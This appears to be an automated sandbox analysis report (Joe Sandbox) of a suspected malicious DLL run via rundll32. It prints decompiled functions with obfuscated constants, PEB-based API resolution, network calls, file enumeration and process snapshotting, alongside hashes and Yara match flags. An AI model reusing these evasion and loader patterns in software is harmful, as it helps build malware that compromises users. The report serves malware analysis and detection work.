                                                                                                                                					_t17 =  *((intOrPtr*)(__esi + 0x14));
                                                                                                                                					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                                                                                                                                						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                                                                                                                                							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                                                                                                                                							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                                                                                                                                								_t17 = E1000744F(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                                                                                                                                								_t38 = _t17;
                                                                                                                                								if(_t17 != 0) {
                                                                                                                                									_push( *((intOrPtr*)(_t29 + 0x10)));
                                                                                                                                									_push(_t28);
                                                                                                                                									return E10007E0B(_t38);
                                                                                                                                								}
                                                                                                                                							}
                                                                                                                                						}
                                                                                                                                					}
                                                                                                                                				}
                                                                                                                                				return _t17;
                                                                                                                                			}







                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 10007476: __getptd.LIBCMT ref: 1000747C
                                                                                                                                  • Part of subcall function 10007476: __getptd.LIBCMT ref: 1000748C
                                                                                                                                • __getptd.LIBCMT ref: 10008095
                                                                                                                                  • Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
                                                                                                                                  • Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3
                                                                                                                                • __getptd.LIBCMT ref: 100080A3
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                • String ID: csm
                                                                                                                                • API String ID: 803148776-1018135373
                                                                                                                                • Opcode ID: cc39f70c6df1ec8a9d72b2261b0a05bbe24867e24c2bb5ffaaef02b389a9eb59
                                                                                                                                • Instruction ID: 4ae378a3382de2502ebb08fd23938688d74dd022792fb74f3eadc7f97f552db9
                                                                                                                                • Opcode Fuzzy Hash: cc39f70c6df1ec8a9d72b2261b0a05bbe24867e24c2bb5ffaaef02b389a9eb59
                                                                                                                                • Instruction Fuzzy Hash: E8016D38C003068AEBB4CF60C450A9EB7F5FF002E1F11842DE5C596AA6CF349A89CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 75%
                                                                                                                                			E10004855(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                				void* _t24;
                                                                                                                                				void* _t27;
                                                                                                                                				void* _t28;
                                                                                                                                
                                                                                                                                				_t28 = __eflags;
                                                                                                                                				_t24 = __edx;
                                                                                                                                				_push(0x44);
                                                                                                                                				E10007B2B(E1001544B, __ebx, __edi, __esi);
                                                                                                                                				E10001AA0(_t27 - 0x28, "invalid string position");
                                                                                                                                				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
                                                                                                                                				E100018F0(_t27 - 0x50, _t27 - 0x28);
                                                                                                                                				E10006B9C(_t27 - 0x50, 0x10019328);
                                                                                                                                				asm("int3");
                                                                                                                                				return 0 |  *((intOrPtr*)(E1000C3E3(__ebx, _t24, __edi, _t28) + 0x90)) != 0x00000000;
                                                                                                                                			}







                                                                                                                                APIs
                                                                                                                                • __EH_prolog3.LIBCMT ref: 1000485C
                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 10004887
                                                                                                                                  • Part of subcall function 10006B9C: RaiseException.KERNEL32(?,?,10007141,?,?,?,?,?,10007141,?,100191C4,1001C640,?,100010D3,00000000,00000003), ref: 10006BDE
                                                                                                                                Strings
                                                                                                                                • invalid string position, xrefs: 10004861
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                                • String ID: invalid string position
                                                                                                                                • API String ID: 1961742612-1799206989
                                                                                                                                • Opcode ID: 5daf48936f8272c34142bea48f113902a28ff72f2cd38ad2eb0383bb24a2986b
                                                                                                                                • Instruction ID: a289488eb33a79d50a16d0c4e8742ffc37e96f116b2cec3b06e278b68cec2fa6
                                                                                                                                • Opcode Fuzzy Hash: 5daf48936f8272c34142bea48f113902a28ff72f2cd38ad2eb0383bb24a2986b
                                                                                                                                • Instruction Fuzzy Hash: A3D017B5C111089AEB04D7E0CC42FDD7338EF08391F840424B211AA08ADF74B689C722
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E10004380() {
                                                                                                                                				intOrPtr* _t21;
                                                                                                                                				intOrPtr* _t23;
                                                                                                                                				intOrPtr _t24;
                                                                                                                                				void* _t29;
                                                                                                                                				signed int _t30;
                                                                                                                                				signed int _t35;
                                                                                                                                				void* _t38;
                                                                                                                                				intOrPtr _t42;
                                                                                                                                				signed short _t43;
                                                                                                                                				intOrPtr _t45;
                                                                                                                                				signed short* _t48;
                                                                                                                                				intOrPtr* _t56;
                                                                                                                                				intOrPtr _t61;
                                                                                                                                				void* _t62;
                                                                                                                                				void* _t67;
                                                                                                                                
                                                                                                                                				_t21 =  *((intOrPtr*)(_t67 + 4));
                                                                                                                                				_t42 =  *((intOrPtr*)(_t21 + 4));
                                                                                                                                				_t23 =  *_t21 + 0x78;
                                                                                                                                				 *((intOrPtr*)(_t67 + 4)) = _t42;
                                                                                                                                				if( *((intOrPtr*)(_t23 + 4)) != 0) {
                                                                                                                                					_t61 =  *_t23;
                                                                                                                                					_t24 =  *((intOrPtr*)(_t61 + _t42 + 0x18));
                                                                                                                                					_t62 = _t61 + _t42;
                                                                                                                                					if(_t24 == 0 ||  *((intOrPtr*)(_t62 + 0x14)) == 0) {
                                                                                                                                						SetLastError(0x7f);
                                                                                                                                						return 0;
                                                                                                                                					} else {
                                                                                                                                						_t43 =  *(_t67 + 0xc);
                                                                                                                                						if(_t43 >> 0x10 != 0) {
                                                                                                                                							_t56 =  *((intOrPtr*)(_t62 + 0x20)) + _t42;
                                                                                                                                							_t48 =  *((intOrPtr*)(_t62 + 0x24)) + _t42;
                                                                                                                                							_t38 = 0;
                                                                                                                                							if(_t24 <= 0) {
                                                                                                                                								goto L15;
                                                                                                                                							} else {
                                                                                                                                								while(1) {
                                                                                                                                									_t29 = E10003D40(_t43,  *_t56 + _t42);
                                                                                                                                									_t67 = _t67 + 8;
                                                                                                                                									if(_t29 == 0) {
                                                                                                                                										break;
                                                                                                                                									}
                                                                                                                                									_t38 = _t38 + 1;
                                                                                                                                									_t56 = _t56 + 4;
                                                                                                                                									_t48 =  &(_t48[1]);
                                                                                                                                									if(_t38 <  *((intOrPtr*)(_t62 + 0x18))) {
                                                                                                                                										_t42 =  *((intOrPtr*)(_t67 + 0x14));
                                                                                                                                										_t43 =  *(_t67 + 0x18);
                                                                                                                                										continue;
                                                                                                                                									} else {
                                                                                                                                										SetLastError(0x7f);
                                                                                                                                										return 0;
                                                                                                                                									}
                                                                                                                                									goto L18;
                                                                                                                                								}
                                                                                                                                								_t30 =  *_t48 & 0x0000ffff;
                                                                                                                                								_t42 =  *((intOrPtr*)(_t67 + 0x14));
                                                                                                                                								goto L14;
                                                                                                                                							}
                                                                                                                                						} else {
                                                                                                                                							_t35 = _t43 & 0x0000ffff;
                                                                                                                                							_t45 =  *((intOrPtr*)(_t62 + 0x10));
                                                                                                                                							if(_t35 < _t45) {
                                                                                                                                								L15:
                                                                                                                                								SetLastError(0x7f);
                                                                                                                                								return 0;
                                                                                                                                							} else {
                                                                                                                                								_t30 = _t35 - _t45;
                                                                                                                                								L14:
                                                                                                                                								if(_t30 <=  *((intOrPtr*)(_t62 + 0x14))) {
                                                                                                                                									return  *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x1c)) + _t30 * 4 + _t42)) + _t42;
                                                                                                                                								} else {
                                                                                                                                									goto L15;
                                                                                                                                								}
                                                                                                                                							}
                                                                                                                                						}
                                                                                                                                					}
                                                                                                                                				} else {
                                                                                                                                					SetLastError(0x7f);
                                                                                                                                					return 0;
                                                                                                                                				}
                                                                                                                                				L18:
                                                                                                                                			}


















                                                                                                                                0x10004433
                                                                                                                                0x10004435
                                                                                                                                0x10004441
                                                                                                                                0x100043d8
                                                                                                                                0x100043d8
                                                                                                                                0x1000442e
                                                                                                                                0x10004431
                                                                                                                                0x10004453
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10004431
                                                                                                                                0x100043d6
                                                                                                                                0x100043cc
                                                                                                                                0x10004396
                                                                                                                                0x10004398
                                                                                                                                0x100043a0
                                                                                                                                0x100043a0
                                                                                                                                0x00000000

                                                                                                                                APIs
                                                                                                                                • SetLastError.KERNEL32(0000007F,10003A72,00000000,RunDLL,00000000,?), ref: 10004398
                                                                                                                                • SetLastError.KERNEL32(0000007F,00000010,00000000,00000000,0000000F,10003A72,00000000,RunDLL,00000000,?), ref: 10004435
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                • Opcode ID: 0756a869ee2afc72d1b676530dd526b8f4d6ef34df736b4a8b7d6015b700ec0c
                                                                                                                                • Instruction ID: 3d8fb55c1078b9c3f35441da5e404d388ad798ba477897f7a328dd853c4c4054
                                                                                                                                • Opcode Fuzzy Hash: 0756a869ee2afc72d1b676530dd526b8f4d6ef34df736b4a8b7d6015b700ec0c
                                                                                                                                • Instruction Fuzzy Hash: B221F0726442128FE700DF54EC84A5BB3E0EBA8391F13812AF984D7245DA35FC10C765
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:30%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:1.7%
                                                                                                                                Total number of Nodes:955
                                                                                                                                Total number of Limit Nodes:23

                                                                                                                                Graph

4435->3701 4437 f57ec5 4436->4437 4438 f5915e GetPEB 4437->4438 4439 f57f32 4438->4439 4439->4425 4441 f58ef6 4440->4441 4442 f5915e GetPEB 4441->4442 4443 f58f57 4442->4443 4443->4425 4445 f48190 4444->4445 4446 f5915e GetPEB 4445->4446 4447 f481f2 4446->4447 4447->4423 4448 f4b5a9 4449 f4833e GetPEB 4448->4449 4451 f4b6ed 4449->4451 4450 f4b79d 4451->4450 4452 f47e0c 2 API calls 4451->4452 4453 f4b783 4452->4453 4453->4450 4454 f519fd GetPEB 4453->4454 4454->4450 4491 f5a29b 4497 f5a4e6 4491->4497 4492 f5a59f 4500 f576e8 4492->4500 4493 f4868b GetPEB 4493->4497 4495 f5a59d 4496 f48fe5 2 API calls 4496->4497 4497->4492 4497->4493 4497->4495 4497->4496 4498 f42a5e GetPEB 4497->4498 4499 f517f0 2 API calls 4497->4499 4498->4497 4499->4497 4510 f57724 4500->4510 4502 f48fe5 GetPEB RtlAllocateHeap 4502->4510 4504 f4c83b GetPEB 4504->4510 4505 f57dfb 4505->4495 4506 f517f0 RtlFreeHeap GetPEB 4506->4510 4508 f42a5e GetPEB 4508->4510 4509 f576e8 5 API calls 4509->4510 4510->4502 4510->4504 4510->4505 4510->4506 4510->4508 4510->4509 4511 f49124 4510->4511 4515 f4a461 4510->4515 4519 f44a0a 4510->4519 4512 f4913c 4511->4512 4513 f5915e GetPEB 4512->4513 4514 f4918d FindNextFileW 4513->4514 4514->4510 4516 f4a476 4515->4516 4517 f5915e GetPEB 4516->4517 4518 f4a4bd FindFirstFileW 4517->4518 4518->4510 4520 f44a1f 4519->4520 4521 f5915e GetPEB 4520->4521 4522 f44a79 4521->4522 4522->4510

                                                                                                                                Executed Functions

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 736 f414e6-f41576 call f4bb26 call f5915e InternetReadFile
                                                                                                                                C-Code - Quality: 62%
                                                                                                                                			E00F414E6(void* __ecx, void* __edx, intOrPtr _a4, DWORD* _a8, void* _a12, void* _a16, long _a20, intOrPtr _a24) {
                                                                                                                                				unsigned int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				signed int _v16;
                                                                                                                                				intOrPtr _v20;
                                                                                                                                				intOrPtr _v24;
                                                                                                                                				intOrPtr _v28;
                                                                                                                                				void* _t28;
                                                                                                                                				int _t33;
                                                                                                                                
                                                                                                                                				_push(_a24);
                                                                                                                                				_push(_a20);
                                                                                                                                				_push(_a16);
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				E00F4BB26(_t28);
                                                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                                                				_v28 = 0x242353;
                                                                                                                                				_v24 = 0x635419;
                                                                                                                                				_v20 = 0x414480;
                                                                                                                                				_v12 = 0x1a41;
                                                                                                                                				_v12 = _v12 + 0xffffa6c5;
                                                                                                                                				_v12 = _v12 ^ 0xffffc9c6;
                                                                                                                                				_v8 = 0xcb6a;
                                                                                                                                				_v8 = _v8 >> 0xd;
                                                                                                                                				_v8 = _v8 ^ 0x00007e4d;
                                                                                                                                				E00F5915E(0x113, 0x979fff61, 0x699633b1);
                                                                                                                                				_t33 = InternetReadFile(_a12, _a16, _a20, _a8); // executed
                                                                                                                                				return _t33;
                                                                                                                                			}












                                                                                                                                APIs
                                                                                                                                • InternetReadFile.WININET(00414480,00635419,00242353,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F41571
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileInternetRead
                                                                                                                                • String ID: M~$S#$
                                                                                                                                • API String ID: 778332206-2280054159
                                                                                                                                • Opcode ID: aba13f9e3387982c78d3daab03ad9a032f14650be2f1b69adc6238fd1d7e46ca
                                                                                                                                • Instruction ID: 64241939c05fbf1fa2ebab3e9b9de4c68a5f5da864ce59041f3b1c344759fb57
                                                                                                                                • Opcode Fuzzy Hash: aba13f9e3387982c78d3daab03ad9a032f14650be2f1b69adc6238fd1d7e46ca
                                                                                                                                • Instruction Fuzzy Hash: 8D01E572C0120EFBCF059FD4DD469DEBFB5EB54309F508088FA1426261D3BA8A64AB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 71%
                                                                                                                                			E00F4A461(void* __ecx, void* __edx, intOrPtr _a4, struct _WIN32_FIND_DATAW* _a8, WCHAR* _a12) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				void* _t18;
                                                                                                                                				void* _t23;
                                                                                                                                
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				E00F4BB26(_t18);
                                                                                                                                				_v12 = 0xe700;
                                                                                                                                				_v12 = _v12 | 0xc4090de4;
                                                                                                                                				_v12 = _v12 ^ 0xc409ad86;
                                                                                                                                				_v8 = 0x9bfc;
                                                                                                                                				_v8 = _v8 + 0x72e3;
                                                                                                                                				_v8 = _v8 ^ 0x000179c0;
                                                                                                                                				E00F5915E(0x11c, 0xe0ee0af6, 0xf90a85c5);
                                                                                                                                				_t23 = FindFirstFileW(_a12, _a8); // executed
                                                                                                                                				return _t23;
                                                                                                                                			}








                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00F4A4C6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst
                                                                                                                                • String ID: r
                                                                                                                                • API String ID: 1974802433-2386229178
                                                                                                                                • Opcode ID: 4c11c40c90ffe02b9f291ba6b4c4355669ac6000b7b8acbb7aef0fa5b4a2856b
                                                                                                                                • Instruction ID: edb5cd3e38440882b6c9d23d08b0cf64933e3ff932acc2c9f415e7be363dd363
                                                                                                                                • Opcode Fuzzy Hash: 4c11c40c90ffe02b9f291ba6b4c4355669ac6000b7b8acbb7aef0fa5b4a2856b
                                                                                                                                • Instruction Fuzzy Hash: 30F067B180520CFFDF05DFD0CD0689E7FB4EB04311F108488B90866211E37A9B64AB80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • CryptDecodeObjectEx.CRYPT32(EBCF86B6,?,4DD5381D,B1E7324B,?,00000000,860B3FA0,00008253), ref: 00F5948E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CryptDecodeObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1207547050-0
                                                                                                                                • Opcode ID: ae9d5ca7cb4f1cedbffe93ad24968d9511f12b017ddd7012b3a622c5cd0d1b6d
                                                                                                                                • Instruction ID: bb05822fe4e8b36b553c4f79abe2cbefb1b0d516e096329447e3900c93c8810d
                                                                                                                                • Opcode Fuzzy Hash: ae9d5ca7cb4f1cedbffe93ad24968d9511f12b017ddd7012b3a622c5cd0d1b6d
                                                                                                                                • Instruction Fuzzy Hash: 9A11CF72800208FFDF46AF94CD46ADDBF72FF08704F109148FA1926161D7728AA0EB40
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 37%
                                                                                                                                			E00F590E0(void* __ecx, int __edx) {
                                                                                                                                				signed int _v8;
                                                                                                                                				unsigned int _v12;
                                                                                                                                				signed int _v16;
                                                                                                                                				signed int _v20;
                                                                                                                                				intOrPtr _v24;
                                                                                                                                				intOrPtr _v28;
                                                                                                                                				void* _t29;
                                                                                                                                				void* _t32;
                                                                                                                                				int _t33;
                                                                                                                                
                                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                                                				_v28 = 0x20a5bc;
                                                                                                                                				_v24 = 0x4de1f3;
                                                                                                                                				_v12 = 0x2345;
                                                                                                                                				_v12 = _v12 << 3;
                                                                                                                                				_v12 = _v12 >> 3;
                                                                                                                                				_v12 = _v12 ^ 0x00006aaa;
                                                                                                                                				_v8 = 0x1846;
                                                                                                                                				_push(0xf90a85c5);
                                                                                                                                				_push(0xdc0f1baa);
                                                                                                                                				_v8 = _v8 * 0x12;
                                                                                                                                				_t33 = __edx;
                                                                                                                                				_v8 = _v8 + 0xffffb2f2;
                                                                                                                                				_v8 = _v8 + 0x1bc5;
                                                                                                                                				_v8 = _v8 ^ 0x000196eb;
                                                                                                                                				_t32 = 0x37;
                                                                                                                                				E00F5915E(_t32);
                                                                                                                                				_t29 = CreateToolhelp32Snapshot(_t33, 0); // executed
                                                                                                                                				return _t29;
                                                                                                                                			}


                                                                                                                                APIs
                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(?,00000000,?,?,000025F3), ref: 00F59157
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateSnapshotToolhelp32
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3332741929-0
                                                                                                                                • Opcode ID: 1418396c3a5ea316a64f2cb4593907badfc609f0a73eaef9ffe606ee10a29cf9
                                                                                                                                • Instruction ID: 68148a3b2f38a2ed3b65e91b8712d3e58841d9a6cc188ebdc5708bb2ea00e0d0
                                                                                                                                • Opcode Fuzzy Hash: 1418396c3a5ea316a64f2cb4593907badfc609f0a73eaef9ffe606ee10a29cf9
                                                                                                                                • Instruction Fuzzy Hash: 5A0128B2D15308EBDB14EFE4CA496DEBBB4AB00319F608089D40066280D3B91B499F81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 628 f4974a-f497dd call f4bb26 call f5915e InternetOpenW
                                                                                                                                C-Code - Quality: 55%
                                                                                                                                			E00F4974A(long __ecx, intOrPtr _a4, char _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				WCHAR* _v16;
                                                                                                                                				intOrPtr _v20;
                                                                                                                                				void* _t27;
                                                                                                                                				void* _t34;
                                                                                                                                				signed int _t36;
                                                                                                                                				long _t41;
                                                                                                                                
                                                                                                                                				_push(_a28);
                                                                                                                                				_t41 = __ecx;
                                                                                                                                				_push(_a24);
                                                                                                                                				_push(_a20);
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a4);
                                                                                                                                				_push(0);
                                                                                                                                				_push(__ecx);
                                                                                                                                				E00F4BB26(_t27);
                                                                                                                                				_v20 = 0x230950;
                                                                                                                                				_v16 = 0;
                                                                                                                                				_v8 = 0x637b;
                                                                                                                                				_v8 = _v8 | 0xedf4c6fd;
                                                                                                                                				_v8 = _v8 + 0xffff8766;
                                                                                                                                				_v8 = _v8 ^ 0xedf44ddd;
                                                                                                                                				_v12 = 0x368c;
                                                                                                                                				_t36 = 0x34;
                                                                                                                                				_v12 = _v12 / _t36;
                                                                                                                                				_v12 = _v12 ^ 0x00005563;
                                                                                                                                				E00F5915E(0x21d, 0xd2cd92be, 0x699633b1);
                                                                                                                                				_t26 =  &_a12; // 0x230950, executed
                                                                                                                                				_t34 = InternetOpenW( *_t26, _t41, 0, 0, 0); // executed
                                                                                                                                				return _t34;
                                                                                                                                			}


                                                                                                                                APIs
                                                                                                                                • InternetOpenW.WININET(P#,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00F497D6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InternetOpen
                                                                                                                                • String ID: P#$P#$cU${c
                                                                                                                                • API String ID: 2038078732-3365909388
                                                                                                                                • Opcode ID: aa0d316a93222f344f818844ca9f044df7bac76a4c6ccb24a4a7cc79e33d5bc8
                                                                                                                                • Instruction ID: 790e6847f6304e74540edf4eaeb10b4f64192ecf1140d4abd09d43f6629d7570
                                                                                                                                • Opcode Fuzzy Hash: aa0d316a93222f344f818844ca9f044df7bac76a4c6ccb24a4a7cc79e33d5bc8
                                                                                                                                • Instruction Fuzzy Hash: 56015772804248BBDF24DF96CC4ACCFBFB9EFC5710F008089B91466260D7B64A21DBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 58%
                                                                                                                                			E00F4BB27(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                				signed int _v8;
                                                                                                                                				unsigned int _v12;
                                                                                                                                				intOrPtr _v16;
                                                                                                                                				intOrPtr _v20;
                                                                                                                                				intOrPtr _v24;
                                                                                                                                				intOrPtr _v28;
                                                                                                                                				void* _t34;
                                                                                                                                				intOrPtr* _t42;
                                                                                                                                				void* _t43;
                                                                                                                                				signed int _t45;
                                                                                                                                				signed int _t46;
                                                                                                                                
                                                                                                                                				E00F4BB26(_t34);
                                                                                                                                				_v28 = 0x1436d7;
                                                                                                                                				_v24 = 0x2ef4fe;
                                                                                                                                				_v20 = 0;
                                                                                                                                				_v16 = 0;
                                                                                                                                				_v12 = 0x447;
                                                                                                                                				_t45 = 0x55;
                                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                                				_v12 = _v12 >> 8;
                                                                                                                                				_v12 = _v12 ^ 0x0000741d;
                                                                                                                                				_v8 = 0x626c;
                                                                                                                                				_t46 = 0x22;
                                                                                                                                				_v8 = _v8 / _t46;
                                                                                                                                				_v8 = _v8 << 1;
                                                                                                                                				_v8 = _v8 ^ 0x00000cab;
                                                                                                                                				_t42 = E00F5915E(0x102, 0xc4b91c54, 0x12faf684);
                                                                                                                                				_t43 =  *_t42(0, _a16, _a12, __ecx, __edx, 0, _a8, _a12, _a16); // executed
                                                                                                                                				return _t43;
                                                                                                                                			}


                                                                                                                                APIs
                                                                                                                                • ObtainUserAgentString.URLMON(00000000,002EF4FE,?,?,?,?,?,?,?,?), ref: 00F4BBB9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AgentObtainStringUser
                                                                                                                                • String ID: lb
                                                                                                                                • API String ID: 2681117516-724383264
                                                                                                                                • Opcode ID: 47ea216081cda5d0b7e56488a9bb852d7ba1bf428d0cd88797943155fd2e1b66
                                                                                                                                • Instruction ID: d9245c8ce9882a7d527d66ffd62cfd35bf0145bb7d85ce1c811765fc9df3fb8f
                                                                                                                                • Opcode Fuzzy Hash: 47ea216081cda5d0b7e56488a9bb852d7ba1bf428d0cd88797943155fd2e1b66
                                                                                                                                • Instruction Fuzzy Hash: 84114571D00209BBEB04DFE4CD098CEBFB5EB44300F208099EA086A290D3B64B609B91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 58%
                                                                                                                                			E00F442F4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				signed int _v16;
                                                                                                                                				intOrPtr _v20;
                                                                                                                                				intOrPtr _v24;
                                                                                                                                				void* _t38;
                                                                                                                                				intOrPtr* _t48;
